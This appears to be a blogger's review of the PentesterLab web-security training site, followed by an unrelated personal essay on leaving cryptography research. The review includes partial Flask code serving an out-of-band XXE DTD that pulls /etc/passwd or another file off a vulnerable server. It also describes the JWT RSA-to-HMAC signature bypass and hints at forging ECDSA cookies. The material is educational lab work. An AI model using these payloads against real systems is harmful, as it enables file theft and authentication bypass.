What you need depends upon what exercises you choose to do, but I expect most people will be like me: wanting to get practical experience exploiting major vulnerabilities that don’t always fall into the OWASP Top 10. For such people, I say that you need to be comfortable with scripting and fiddling around with various programming languages, such as Ruby, PHP, Python, Java, and C. If you haven’t had experience with all of these languages, that’s okay: there are good videos (pro membership) that help enormously. The main thing is that you need to be not afraid to try, and there might be sometimes where you might need to Google for an answer. But most of the time, you can get everything you need directly from PentesterLab.

I personally like to use Cygwin on Windows and/or a Linux virtual machine. The vast majority of the time, I was able to construct the attack payload myself (with help from PentesterLab), but there are a few exercises such as Java Deserialization where you need to run somebody else’s software (in this case, ysoserial). Although that comes from very reputable security researchers, I being ultra-paranoid prefer to run software I don’t know on a virtual machine rather than my main OS.

If you are an absolute beginner in pentesting and have no experience with Burp, I think that you will be okay. But you will likely depend upon the videos to get you started. The video in the first JWT exercise will introduce you to setting up Burp and using the most basic functionality that you will need. By the way, I have done everything using the free version of Burp, so no need to buy a licence (until you’re ready to chase bug bounties!)

Quality of the content

For each exercise there is a course with written material, an online exercise (pro membership only — others can download the ISO), and usually there are videos (pro members only).

You can see examples of the courses in the free section, and I think the quality speaks for itself. With pro membership, you get a lot more of this high quality course material. The only thing that I would suggest to the author is that including a few more external references for interested readers could be helpful. For example, the best place to learn about Java deserialization is Foxgloves security, so it would be great to include the reference.

The videos really raise the bar. How many times have you struggled through watching a Youtube video showing how to perform an attack with frustration of the presentation? You know, those videos where the author stumbles through typing the attack description (never talking), with bad music in the background? Maybe you had to search a few times before finding a video that is reasonably okay. Well, not here — all the videos are very high quality. The author talks you through it and has clearly put in a lot of thought into explaining the steps to those who do not have the experience or background with the attack.

Last, the online exercises are perfect: simple and to the point, allowing us to try what we learned.

Sometimes the supporting content is enough for you to do an entire exercise, other times you have to think a bit. Many videos are spoilers — they show you how to solve the exercise completely (or almost completely), but it is usually best to try yourself before falling back to the videos: you won’t get more out of it than what you put into it.

Finally, I want to compare the quality of PentesterLab to some other educational material that I have learned a lot from:

  • OSCP, which is infrastructure security as opposed to the web application security from PentesterLab. OSCP is the #1 certification in the industry, and is at a very reasonable price. It also has top quality educational material. I learned a lot doing OSCP, but the problem is that I did not complete it. I ran out of time (wife and kids were beginning to forget who I was) to work on it. And despite having picked up so many great skills from enrolling, at the end of the day it never helped me land a pentester job close to my desired salary level. I guess I needed to just try harder. The great thing about PentesterLab is that it’s not an all or nothing deal: you will pick up certification (badge) after certification (badge) as you go along. In terms of quality comparison, I’d say PentesterLab material is on par with OSCP.
  • Webgoat is the go-to free application for learning about penetration testing. I played with it a few years ago and learned a fair amount. There were a few exercises that I did not know how to solve, and I was rather frustrated that the tool did not help me. For example, in one of the SQL injection exercises, I needed to know how to get the column names in the database schema in order to solve it (I want to understand rather than just sqlmap it). I really think the software should have provided me some guidance on that (I know how to do that now, thanks to PentesterLab). PentesterLab just provides a lot more guidance and support, and has a lot more content.
  • Infosec Institute in my experience has been a fantastic source of free information to help learn application security. It covers a wide variety of topics in very good detail. But it lacks the nice features you get with PentesterLab pro membership: videos, and the ability to try online without the overhead of fetching resources from other places to get set up.  If your time is precious, the US$20 per month is nothing in comparison to what you gain from PentesterLab pro.

What most amazes me is that just about all of the content here was primarily made by a single person. Wow.

Three example exercises I really liked

Exercise: Play XML Entities (Out of band XXE)

XXE is a fun XML vulnerability that can allow an attacker to read arbitrary files on the vulnerable system. Although many XXE vulnerabilities are easy to exploit, there are other times where the vulnerability exists but the file you are trying to read from the OS does not get directly returned to you. In such cases, you can try an out of band XXE attack, which is what the Play XML Entities exercise is all about.

In the course the author provides an awesome diagram of how it all works, which he explains in detail:


(Diagram copyright Louis Nyffenegger, used with his permission).

Briefly, the attacker needs to setup by having his own server (“Attacker’s server” in diagram) that serves a DTD. The attacker sends malicious XML to the server (step 1), which then remotely retrieves the attacker’s DTD (steps 2-3). The DTD instructs the vulnerable server to read a specific file from the file system (step 4) and provide to the attacker’s server (step 5).

So to start out, you need your own web server that the vulnerable application will fetch a DTD from. In this case, you are a bit on your own on what server you are going to use. I personally have experience with Heroku, which lets you run up to 5 small applications for free.

PentesterLab shows how to run a small Webrick server (Ruby), but I’m more of a Python guy and my experience is with Flask. Warning: Heroku+Flask has been a real pain for me historically, but I now have it working so I just continue to go with that.

To provide a DTD that asks for the vulnerable server to cough up /etc/passwd, I did it like this in Flask:

def testdtd():
    dtd = '''
    <!ENTITY % p1 SYSTEM "file:///etc/passwd">
    <!ENTITY % p2 "<!ENTITY e1 SYSTEM ';'>">
    return dtd

The recorddata endpoint is another Flask route (code omitted) that records the /etc/passwd file retrieved from the vulnerable server (my DTD is essentially equivalent to the one from PentesterLab).

This is all fine and dandy except one thing: /etc/passwd is not the ultimate goal in this exercise. Instead, there is a hidden file on the system somewhere that you need to find, and it contains a secret that you need to get to mark completion of the exercise. So, a static DTD like this doesn’t do what I need.

At first, I was manually changing the DTD every time to reference a different file, then re-deploying to Heroku, and then trying my attack through Burp. I thought I would find the secret file quickly, but I did not. This was way too manual, and way to slow. What an idiot I was for doing things this way.

Then I used a little intelligence and did it the right way: Make the Flask endpoint take the file name as a query string parameter, and return the corresponding DTD:

def dtdsmart():
    dtd = '''
    <!ENTITY % p1 SYSTEM "file:///''' + targetfile + '''">
    <!ENTITY % p2 "<!ENTITY e1 SYSTEM ';'>">
    return dtd

I was very proud of myself for this trivial solution. Never mind the security vulnerability in it!

Overall, the course material gives a great description on what to do, but sometimes you have to bring in your own ideas to do things a better way.

Exercise: JWT II

Json Web Tokens (JWT) are a standard way of communicating information between parties in a tamper-proof way. Except when they can be tampered.

In fact, there is a fairly well known historical vulnerability in a number of JWT libraries. The vulnerability is due to the JWT standard allowing too much flexibility in the signing algorithm. One might speculate why JWTs were designed this way.

PentesterLab has two exercises on bypassing JWT signatures (pro members only). The first one is the most obvious way, and the way you would most likely pull it off in practice (assuming a vulnerable library). The second is a lot harder to pull off, but a lot more fun when you succeed.

In JWT II, your username is in the JWT claims, digitally signed with RSA. You need to find a way to change your username to ‘admin’, but the signature on it is trying to stop you from doing that.

To bypass the signature, you change the algorithm in the JWT from RSA (an asymmetric algorithm) to HMAC (a symmetric algorithm). The server does not know that the algorithm has changed, but it does know how to check signatures. If it is instructed to check the signature with HMAC, it will do so. And it will do it with the key it knows — not an HMAC key, but instead the RSA public key.

In this exercise, you are given the RSA public key, encoded. At a theoretical level, exploiting it may seem easy: just create your own JWT having username ‘admin’, set the algorithm to HMAC, and then sign it by treating the RSA public key like it is an HMAC key.

In practice, it’s not that simple. When I was attempting this, I was completely bothered by not knowing how to treat an RSA key as an HMAC key. I attempted in Python, fiddling around a few different ways for inserting the key to create the signature. None of them worked.

I thought to myself that this depends so much on implementation, and surely there must be a better way of going about things than random trials. Hmmmm, somehow the author must have left a hint on how to encode it so we can solve the exercise…


Exercise: ECDSA

According to stats on the site, the ECDSA looks to be the most challenging exercise. I decided to go after it because I was once a cryptographer and I was excited to see an exercise like this.

Honestly, most people will not have the cryptographic background to do an exercise like this, particularly because ECDSA is in the capture the flag badge, so there is no guidance. You are on your own, good luck! But I’ll drop you a hint.

In the exercise, they give you the Ruby source code, which is a few dozen lines. The functionality of the site allows you to register or login only. Your goal is to get admin access.

From the source code you will see that it digitally signs with an ECDSA private key a cookie with your username in it. To check the cookie, it verifies the signature with the public key.

The most surprising thing here is that you don’t even get the public key (nor the private key, of course). You have to somehow find a way to create a digitally signed cookie with the admin username in it, and you have absolutely nothing to go by other than the source code.

I promised you a hint. Look for a prominent example of ECDSA being broken in the real world.

Concluding Remarks

I think it is clear that I really, really like this website and highly recommend it. Having said that, it is always better to get more than one opinion, and for that reason, I invite other users of PentesterLab either to comment here or on reddit about their experience with the website.

Speak up people!

Why I left cryptography

This blog is a follow-up on my previous blog, How I became a cryptographer, which describes the very long, intense journey I took to get to the state where I could make a living publishing research in cryptography.  A few people have asked why I left, so here I give my reasons.  This blog may be useful to people who are uncertain whether they want to make a similar journey.

Feeling disconnected from the real world

The biggest reason why I left is that I felt cryptography research was more focused on the mathematics than it was on the real world applicability.  As much as I love the mathematics, algorithms, and puzzle solving, I wanted to work on research that mattered.  But the longer I stayed in cryptography, the more disconnected I felt from the real world.

Truthfully, the restrictions I put on myself limited me: I did not want to leave Sydney and I did not want to spend the majority of my time teaching.  Had I not kept those restrictions, I could have had more chances.  With them, the only job that I found to keep me going was to be a PostDoc research fellow.

As a PostDoc research fellow, you are typically paid by a government research grant that may last a couple years.  When you are paid by such a grant, you need to deliver results that are in agreement with that grant so that in the future, you have evidence that can be used to apply for similar grants to keep you going.  And that cycles.

If you are really good and daring, you might stray from the research grant topic once in a while to see if you can make an impact somewhere else.  But your time for that is very limited.

I started on research grants involving number theory, then moved to research grants about cryptanalysis.  In this time, I got my top two research results, one of which influenced the field but unfortunately will never be used in the real world, the other of which had an important impact on what NIST declares acceptable today.  Also during that time, I did a lot of research that had hardly any relevance to the real world.

While being a PostDoc, I saw a lot of new crypto conferences popping up, and a lot of new crypto researchers publishing at new conferences.  Let’s just say that this was not due to an increase in quality in the field.  Instead, there were more opportunities to publish irrelevant research, which a researcher could use as evidence of making an ‘impact.’

I wanted to know what were the right problems to work on, but the longer I stayed in the field, the less vision I had on where to look.  I was stuck in the cycle, with no vision of what the real world needed.  I simply was not going to get that vision by continuing to do what I was doing.


When designing a cipher, every cryptographer will tell you the first requirement.  Nobody will look at it unless it follows Kerckhoffs’ principle: the security of the cipher should depend upon the secret key and nothing else.  No secret algorithms.

With the AES selection competition between 1997-2000, several cryptographers tried to raise the bar.  Instead of just coming up with a design and relying on others to attack it, the designers should put some effort in themselves to show that it does not trivially fall to common attacks such as linear and differential cryptanalysis.  I myself worked with the RC6design team (though I was not a designer myself), and we provided extensive analysis on the security of RC6.  We were proud of this.

However, a competitor algorithm went much further.  Not only did the designers attempt various cryptographic techniques against their design, but they also proved (under reasonable assumptions) that the design was resistant to first order linear and differential cryptanalysis.  The proof was via the Wide Trail Strategy.  Their cipher, Rijndael, was the favourite amongst the majority of the cryptographers, and ultimately won the AES competition.  Even as a competitor to them, there is no doubt in my mind that the right cipher won.

This was great.  With the turn to the 21st century, we had a new standard of excellence.  Moving the bar beyond the 19th century Kerchoffs’ principle, we now require designers to put substantial effort into analysing and proving the security of their design before presenting it to us.  Right?

That was my thought, but it is totally wrong.  For two reasons:

  • With the increase in the number of crypto conferences and crypto researchers, there was no possibility of enforcing a standard of excellence.  The doors were (and still are) wide open to publish a low quality design in a low quality conference.
  • Ultimately a fair number of designs get used in the real world long before going through a rigorous analysis and peer review process.

Sure, some designs start getting attention after they have been in use for a while, and by that time we either find problems in them or else fall back to “this algorithm has been in use for a long time and nobody has found problems with it, therefore we can trust it.”  And thus, the science is not maturing.

It is a lot easier to design something than it is to break something.  For every one man-hour used to design, it can take one or two orders of magnitude more man-hours to analyse, or maybe even more (depending upon the skills of the designer).  The cryptanalysist simply cannot keep up with the designers, so we instead declare that we will not look at their design for whatever reason.

I wish cryptography would get beyond Kerchoffs’ principle.  I wish the effort between design and cryptanalysis was more balanced.  I wish we could give designers more practical advice on what it takes for their cipher to get attention.

I don’t believe that will ever happen.

A lot of labour for little reward

I started out with an attitude like Paul Erdős, but eventually materialism crept in.  It’s a lot easier to be idealistic when you are young and single than it is when you’re beginning to settle down and think about having a family.

As my software skills were dated, I felt very lucky that I could get out when I did.  Fortune brought me to a fantastic printer research company in Sydney that were mainly looking for smart people.  They offered me a good salary, and I was happy to leave cryptography behind.

I was able to maintain a decent salary, but it took me a good 7 years or so before I got to the point where I had strong enough skills in demand so that I could change employment without too much difficulty if I needed to.

Every now and then I get a call from a recruiter about a bank or other large company looking to hire a cryptographer.  They don’t need a researcher, instead somebody who really knows and can advise about cryptography.  I stopped pursuing these potential opportunities: they pay well, but my interests in security go way beyond cryptography, so I don’t want to pigeon-hole myself as a cryptographer only.

What I do today

Now I do more general security, which includes code review, penetration testing, and architecture/design.  I have strong skills in web security and embedded security.  I like having this breadth of expertise, but I also have an depth of expertise in cryptography, which distinguishes me from most people who do similar work.  The cryptography background is definitely a benefit.  But I am sure glad that I do a lot more than just that.